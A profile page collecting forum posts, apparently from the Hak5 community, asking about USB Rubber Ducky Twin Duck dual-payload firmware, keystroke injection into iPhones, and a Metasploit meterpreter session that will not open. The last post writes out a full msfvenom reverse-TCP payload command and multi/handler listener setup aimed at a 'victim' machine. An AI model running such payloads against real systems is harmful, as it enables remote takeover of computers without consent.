
aideux

Posts posted by aideux

  1. On 7/28/2018 at 9:31 PM, MB60893 said:

    I do not off the top of my head. I know that such commands are possible with a Bluetooth keyboard (such as the Logitech Bluetooth keyboards for iPad, which you can press combinations of buttons for using the "command" key and letters on the keyboard, which would work I assume by using the "GUI" button syntax for the USB Rubber Ducky/Bash Bunny.)

    So I was able to get the injection working, but can't seem to find the commands for interacting with the touchscreen via a keyboard.

  2. 1 hour ago, MB60893 said:

    I do not off the top of my head. I know that such commands are possible with a Bluetooth keyboard (such as the Logitech Bluetooth keyboards for iPad, which you can press combinations of buttons for using the "command" key and letters on the keyboard, which would work I assume by using the "GUI" button syntax for the USB Rubber Ducky/Bash Bunny.)

    Hmmm, I'll give it a shot, and post back what I find! Thanks for the tip!

  3. 8 hours ago, MB60893 said:

    You would need a Lightning adapter for most modern iPhones, the only caveat being that any accessory plugged into an iOS device prompts whether or not you wish to "Trust" the device that is connected to your phone. Permitting you know the passcode and are able to press "Trust", go for it. ^_^

     

    Do you know what the syntax is for the touchscreen (swiping left, right; tapping, etc.)?

  4. 1 hour ago, Just_a_User said:

    It's in here?

    https://github.com/hak5darren/USB-Rubber-Ducky/blob/master/Firmware/Source/Composite_Duck - Multi/src/main.c

    Maybe it's always GPIO button but payload1 if caps on and payload2 if not?

    Hm, I see that. Looks like it is "inject.bin" and "inject2.bin". Also, num lock would affect payload 1 and caps would initiate payload 2? This block of code makes me think that:

     

    void ui_kbd_led(uint8_t value)
    {
    	if(!in_affect){
    		//this is called when LEDs CAPS LCK, NUM LCK change
    		if (value & HID_LED_NUM_LOCK) {
    			// Here, turn on Num LED
    			LED_On( LED1 );
    			in_affect=true;
    			//use injectarray
    			state = state_START_INJECT;
    		} else{
    			// Here, turn off Num LED
    			LED_Off( LED1 );
    		}
    		if (value & HID_LED_CAPS_LOCK) {
    			// Here, turn on CAPS LED
    			LED_On( LED0 );
    			in_affect=true;
    			//use injectarray2
    			for (int c=0;c<(sizeof(inject_array2));c++){
    				inject_array[c]=inject_array2[c];
    			}
    			state = state_START_INJECT;
    		} else{
    			// Here, turn off CAPS LED
    			LED_Off( LED0 );
    		}
    	}
    }

    I haven't written in C in a while, though, so I'm not sure if injectarray = inject.bin / injectarray2 = inject2.bin. Can anyone confirm? 

     

    Also, does the key (caps lock or num lock) need to be active for the payload to work, or does one put the ducky in first, and then press the corresponding button? I'm not with it right now, or I would test this, but I'd love to know from someone more knowledgeable.

  5. 3 hours ago, Just_a_User said:

    I'm not sure that's the case; I think it's payload one when caps/num/scroll lock are pressed and GPIO button for payload two? I think the term twin duck refers more to Storage and Payload. Maybe I'm wrong; someone will correct me. But it's worth searching the forums for more info - like the below

     

    What do I need to name the payloads, and is the setup any different, or is it like “inject.bin” and “inject2.bin”? Thanks :)

  6. I understand how to script payloads and write them to the Ducky, but I'm a little confused as to how to get the two payloads working using Twin Ducks. I understand that one payload would be executed when Caps Lock is active and the Ducky is inserted, while the other would work when Num Lock is active before the Ducky is inserted, but I'm unsure as to how to get the Ducky to differentiate between the two payloads. I'm assuming there are two inject.bin files that are named differently, but I would love if someone could explain this process a little further for me, as I can't seem to find any Twin Ducks documentation anywhere. Thank you!

     

    P.S. Already posted this in the Ducky GitHub, but it doesn't really look like the "Issues" tab gets much activity, so I thought I'd post here too. Just for anyone wondering why I didn't start there.

  7. For some reason, I keep getting an issue where, when the victim double-clicks on the payload, a session is opened, but not the console that would allow me to use meterpreter. To create the payload, I use this code:

    msfvenom -p windows/meterpreter_reverse_tcp --platform windows -a x86 -f exe LHOST=[attacker IP address] LPORT=5555 -o /root/Desktop/[filename].exe

    Then, in the Metasploit console, I type:

    use multi/handler

    set payload windows/meterpreter_reverse_tcp

    set LHOST [attacker IP address]

    set LPORT 5555

    exploit

    Then, a session is opened, but the line that looks like "meterpreter>" does not open.

    I have tried using different ports, and have also attempted to use ngrok, which did not work. The system I am attacking is my own Windows 10 VM. Can someone please help me out? I am new to using Metasploit, and would love some advice.
